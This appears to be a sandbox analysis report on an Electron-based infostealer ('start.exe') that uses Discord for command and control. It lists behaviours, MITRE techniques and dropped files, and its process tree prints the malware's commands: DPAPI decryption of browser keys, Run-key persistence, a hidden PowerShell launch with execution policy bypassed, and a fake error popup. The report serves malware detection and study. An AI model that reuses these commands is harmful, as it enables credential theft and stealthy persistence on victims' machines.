34514a17baaffe570d209aa16f9aeba094c71982181af860046579868f3e6d6b

Analysis

max time kernel
600s
max time network
457s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
16/06/2024, 20:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

start.exe
Size

168.6MB
MD5

cd474da30f0d5e84a0afd1e3dea2795b
SHA1

77cbce7a97bc32f9e19e6a16a82e090d6a37ba85
SHA256

5ae5dbfd4f086375c8ad87b360a40d6635de6876058e28cdd7aacb4fa42eb003
SHA512

cfa18a666de7322fc6515aa79699259fd5d3e3013e7cd2d79b65726ce11fefbf29fd5271205ded8104a7b2c7dbbe167bbb5dc4277bf6912800ce4a3886c9bb06
SSDEEP

1572864:w5E0RnsAbXR4dkbNVL4KPN05+4k0YPbp2sfZNX/9umyU/RczANJpehUxqSdkpKfm:QRt9mJ9YkRydLrY

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4676	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	start.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.exe	start.exe

Loads dropped DLL 2 IoCs

pid	Process
4368	start.exe
4368	start.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\start.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\jyaVUgGxwsTltNX.ps1\""	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	discord.com
31	discord.com

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
3432	cmd.exe
2428	cmd.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
3756	tasklist.exe
3440	tasklist.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2200	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4700	powershell.exe
4700	powershell.exe
3336	powershell.exe
3336	powershell.exe
4676	powershell.exe
4676	powershell.exe
3220	start.exe
3220	start.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3756	tasklist.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeDebugPrivilege	3440	tasklist.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe
Token: SeCreatePagefilePrivilege	4368	start.exe
Token: SeShutdownPrivilege	4368	start.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4368 wrote to memory of 1928	4368	start.exe	82
PID 4368 wrote to memory of 1928	4368	start.exe	82
PID 1928 wrote to memory of 3756	1928	cmd.exe	84
PID 1928 wrote to memory of 3756	1928	cmd.exe	84
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 1144	4368	start.exe	86
PID 4368 wrote to memory of 376	4368	start.exe	87
PID 4368 wrote to memory of 376	4368	start.exe	87
PID 4368 wrote to memory of 3432	4368	start.exe	88
PID 4368 wrote to memory of 3432	4368	start.exe	88
PID 3432 wrote to memory of 4700	3432	cmd.exe	90
PID 3432 wrote to memory of 4700	3432	cmd.exe	90
PID 4368 wrote to memory of 2428	4368	start.exe	91
PID 4368 wrote to memory of 2428	4368	start.exe	91
PID 2428 wrote to memory of 3336	2428	cmd.exe	93
PID 2428 wrote to memory of 3336	2428	cmd.exe	93
PID 4368 wrote to memory of 2372	4368	start.exe	94
PID 4368 wrote to memory of 2372	4368	start.exe	94
PID 4368 wrote to memory of 4068	4368	start.exe	96
PID 4368 wrote to memory of 4068	4368	start.exe	96
PID 2372 wrote to memory of 2852	2372	cmd.exe	98
PID 2372 wrote to memory of 2852	2372	cmd.exe	98
PID 2852 wrote to memory of 216	2852	cmd.exe	99
PID 2852 wrote to memory of 216	2852	cmd.exe	99
PID 4068 wrote to memory of 3440	4068	cmd.exe	100
PID 4068 wrote to memory of 3440	4068	cmd.exe	100
PID 4368 wrote to memory of 3448	4368	start.exe	101
PID 4368 wrote to memory of 3448	4368	start.exe	101
PID 4368 wrote to memory of 3452	4368	start.exe	102
PID 4368 wrote to memory of 3452	4368	start.exe	102
PID 3448 wrote to memory of 2200	3448	cmd.exe	105
PID 3448 wrote to memory of 2200	3448	cmd.exe	105
PID 3452 wrote to memory of 4676	3452	cmd.exe	106
PID 3452 wrote to memory of 4676	3452	cmd.exe	106
PID 4676 wrote to memory of 4548	4676	powershell.exe	107
PID 4676 wrote to memory of 4548	4676	powershell.exe	107

C:\Users\Admin\AppData\Local\Temp\start.exe
"C:\Users\Admin\AppData\Local\Temp\start.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3756
- C:\Users\Admin\AppData\Local\Temp\start.exe
  "C:\Users\Admin\AppData\Local\Temp\start.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\start" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,9091586642239167375,6508422445498317038,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  PID:1144
- C:\Users\Admin\AppData\Local\Temp\start.exe
  "C:\Users\Admin\AppData\Local\Temp\start.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\start" --field-trial-handle=2024,i,9091586642239167375,6508422445498317038,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2020 /prefetch:3
  2⤵
  PID:376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,146,135,155,32,191,112,14,76,129,255,130,209,174,59,131,102,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,186,109,212,227,244,236,205,6,28,7,106,144,223,110,146,225,238,158,247,129,99,155,32,148,79,240,50,106,59,161,34,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,216,90,47,58,148,225,37,55,193,154,218,166,91,57,178,74,65,9,193,119,226,149,67,214,51,177,32,224,155,55,57,52,48,0,0,0,152,3,105,191,205,171,117,129,93,81,205,235,228,109,134,253,45,55,133,98,0,23,9,151,153,215,99,153,205,33,231,104,19,188,121,15,39,4,64,39,108,5,163,128,100,108,214,247,64,0,0,0,25,179,69,172,31,55,188,151,119,239,51,255,194,18,35,168,221,81,140,111,243,54,247,89,167,219,218,144,150,205,25,206,37,88,250,33,91,187,43,206,243,106,111,134,164,43,111,75,167,165,5,244,129,111,135,102,22,118,166,136,52,240,7,188), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:3432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,146,135,155,32,191,112,14,76,129,255,130,209,174,59,131,102,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,186,109,212,227,244,236,205,6,28,7,106,144,223,110,146,225,238,158,247,129,99,155,32,148,79,240,50,106,59,161,34,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,216,90,47,58,148,225,37,55,193,154,218,166,91,57,178,74,65,9,193,119,226,149,67,214,51,177,32,224,155,55,57,52,48,0,0,0,152,3,105,191,205,171,117,129,93,81,205,235,228,109,134,253,45,55,133,98,0,23,9,151,153,215,99,153,205,33,231,104,19,188,121,15,39,4,64,39,108,5,163,128,100,108,214,247,64,0,0,0,25,179,69,172,31,55,188,151,119,239,51,255,194,18,35,168,221,81,140,111,243,54,247,89,167,219,218,144,150,205,25,206,37,88,250,33,91,187,43,206,243,106,111,134,164,43,111,75,167,165,5,244,129,111,135,102,22,118,166,136,52,240,7,188), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,146,135,155,32,191,112,14,76,129,255,130,209,174,59,131,102,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,174,14,162,34,66,73,206,116,182,127,114,2,171,123,135,124,225,154,20,27,58,4,167,12,178,172,64,131,218,67,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,240,173,42,13,11,144,3,115,122,107,137,176,247,76,214,207,66,222,0,104,118,158,117,200,119,29,151,34,240,118,122,219,48,0,0,0,148,122,240,163,189,64,103,153,194,244,87,19,169,173,58,176,63,222,60,131,109,57,152,191,225,217,154,222,160,28,142,77,8,166,182,4,41,135,44,45,105,242,189,36,81,248,91,95,64,0,0,0,193,252,85,91,119,40,8,17,113,113,70,167,74,214,247,169,29,167,75,72,45,153,75,72,158,238,71,93,255,180,6,44,121,96,228,94,194,89,105,248,55,69,233,13,28,192,42,98,242,196,51,165,71,52,84,198,95,29,104,12,191,31,206,77), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,146,135,155,32,191,112,14,76,129,255,130,209,174,59,131,102,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,174,14,162,34,66,73,206,116,182,127,114,2,171,123,135,124,225,154,20,27,58,4,167,12,178,172,64,131,218,67,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,240,173,42,13,11,144,3,115,122,107,137,176,247,76,214,207,66,222,0,104,118,158,117,200,119,29,151,34,240,118,122,219,48,0,0,0,148,122,240,163,189,64,103,153,194,244,87,19,169,173,58,176,63,222,60,131,109,57,152,191,225,217,154,222,160,28,142,77,8,166,182,4,41,135,44,45,105,242,189,36,81,248,91,95,64,0,0,0,193,252,85,91,119,40,8,17,113,113,70,167,74,214,247,169,29,167,75,72,45,153,75,72,158,238,71,93,255,180,6,44,121,96,228,94,194,89,105,248,55,69,233,13,28,192,42,98,242,196,51,165,71,52,84,198,95,29,104,12,191,31,206,77), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Windows\system32\cmd.exe
    cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      4⤵
      PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4068
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system32 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\start.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3448
- - C:\Windows\system32\reg.exe
    REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system32 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\start.exe"
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4676
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2vq0icap\2vq0icap.cmdline"
      4⤵
      PID:4548
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7733.tmp" "c:\Users\Admin\AppData\Local\Temp\2vq0icap\CSCC16FE7E28A114BEEA7BD997A9D432CE4.TMP"
        5⤵
        
        PID:3008
- C:\Users\Admin\AppData\Local\Temp\start.exe
  "C:\Users\Admin\AppData\Local\Temp\start.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\start" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2496,i,9091586642239167375,6508422445498317038,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
4620e88587bbb7ed8783edf81e568e76

SHA1
b6c148a0d62930c22f55728421bf69c696f0b4e5

SHA256
56a95f9497dfb5f7888b207e5ef61f5a102ee413e389bc71ade5181e4f22c94c

SHA512
07039c33ee55469bf9e6a1243211a883668bef987610023a92639536caedc4371e7825c6438d0f2c991cf4faa8a3fe9d3fe439b5df28fcc734176f520cd02167

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f48896adf9a23882050cdff97f610a7f

SHA1
4c5a610df62834d43f470cae7e851946530e3086

SHA256
3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

SHA512
16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f867219c6fe93e02fdc11213a8a4186e

SHA1
def0b690962ced8a926c842f017ffd0e2ae178ad

SHA256
a2a15259602286af08608e9f04e1c8cfcbc2f36f62b670253f86b8307b39b5c3

SHA512
77ecbd8699d192a78ed90a034d8e1a14a1d8ad2bca245fbe4017e4b8cc9ba328bff5555b89d9e1f08f25431c96f4019529a42112ed8287f95cd59be9aaa5778c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
37c2d9a72cbf3cb1db240be665a1b99a

SHA1
210fce6deff3fcbd2ba964ed709953d68fc7ce8b

SHA256
51c0b37ec0660b1ec9c15d5506e9f222158d41d5882a5f7bb14110b918b61d1e

SHA512
d3bb56bb433dcc64a35f20f11120ceb9800e23cc2762a8084e90ffe163b8929464f10fec428eb659355ba2520f6a17e5d2b939e73e20f66014666317958d84b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2vq0icap\2vq0icap.dll

Filesize
3KB

MD5
6e4aea63dab86c20107c9b05f5172587

SHA1
ed527f434a1e3d2d09403a2fccfc5cb06901693e

SHA256
a5b4cae68d302e88e44a5dcd5d7e2b2b46b2ce665ea47aa23eb2f6d5f4c38742

SHA512
07b27042436c15726ab731a612b32502d276bcd5679b2c0c1a092e7593559fff9934869519c607b394760fa0865f993cc91a65456535efc1d40ebf383a72e6a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\38cf6bf0-132b-4e9d-9584-ac38f520e6ab.tmp.node

Filesize
137KB

MD5
04bfbfec8db966420fe4c7b85ebb506a

SHA1
939bb742a354a92e1dcd3661a62d69e48030a335

SHA256
da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd

SHA512
4ea97a9a120ed5bee8638e0a69561c2159fc3769062d7102167b0e92b4f1a5c002a761bd104282425f6cee8d0e39dbe7e12ad4e4a38570c3f90f31b65072dd65

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pompa_Lol\Browser.zip

Filesize
332B

MD5
6ccce1527e26275907a75529101e0ad2

SHA1
a269df5427a501470d9216713d79a9725341a74a

SHA256
e442a08a95b38b11d10842ba38c5fcfddac2e713653e4ab0ecc69ca98e17855c

SHA512
6064093d71f4f0ea6fc7cbd8c873762aca3eec2d6a28a6adae0ceac9c4a46c3b2f370047a5dafd7d21f3e76d0b197d2af6e9b40dbecf0e1ac54dce763663f575

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7733.tmp

Filesize
1KB

MD5
fa09d33786a1d8e1745f4503d204eaa5

SHA1
72bcfc1695530ec5c610bf97ddb6cfea03ccba1d

SHA256
6f476ec424c06ff3d39d109af313612d8dc8ec658af767fd29466591d6f5e255

SHA512
2a03225bb65105d3829c152c7eba39ea4b069d209aff83c5b32a791587e624432f2e69ed7a0e111a71e5acbf3738d5370be1f1c58c66358f960119defccb54af

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vygqr2un.xgl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\d5a8f58e-505e-4843-89af-4d1c1952059d.tmp.node

Filesize
1.6MB

MD5
a25db2cdfd502ce0109cb21c225217a5

SHA1
ae53a1e0bf39e1a484d44d482ce275185cba8d6d

SHA256
025596a3f1e7489b0c15debdb846ad5a21901b4910e38ca14afe982ea9fefe6a

SHA512
5901bd9210c7f40e263bfa8eb92e43acfbfb2cb8fa2421dd2252ab5bfed280e471d72f8a0d1ac52a3b912fc17a7d577bbf98d24a2e6d8f305395a0b17c53fe18

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2vq0icap\2vq0icap.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2vq0icap\2vq0icap.cmdline

Filesize
369B

MD5
65c12fbc0901646f6ebabeb6b04d22af

SHA1
6fa0c0cb9ad53acf346943b316d636761aa5a183

SHA256
daf6ebbd425b8f0835bd01435600a5bb799df4c83eaee6aa6bc2979c0ad4fa19

SHA512
b2f7b7e0140fcbce66712faea8298ac87fe7588bc0b926e51e23645d6f18b8e096b677e5139430761a88e49e864a76ebbabb96f85fe3b7b039e16dfa2b69fc88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2vq0icap\CSCC16FE7E28A114BEEA7BD997A9D432CE4.TMP

Filesize
652B

MD5
5463de69d2c0c3a7c9b3dd591d440f5a

SHA1
85d548c89f2fdc434b6dbe8a90eb02f601b36adc

SHA256
b2eb4e39d479e3b1e1f5e1c2fc4d39d80437d570ff03c495c8c80f33fcb23403

SHA512
1992e49558265f8f32ad20fb89f58daa73910ba78f62411ac6d07fbc508b0f0bf015d07ed6d202fae7462e35059e834908bece02eb3e5d3bc814d0689c6e48a4

Download Submit
memory/3220-111-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-107-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-106-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-105-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-117-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-116-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-115-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-114-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-113-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
memory/3220-112-0x0000017958AB0000-0x0000017958AB1000-memory.dmp

Filesize
4KB

Download
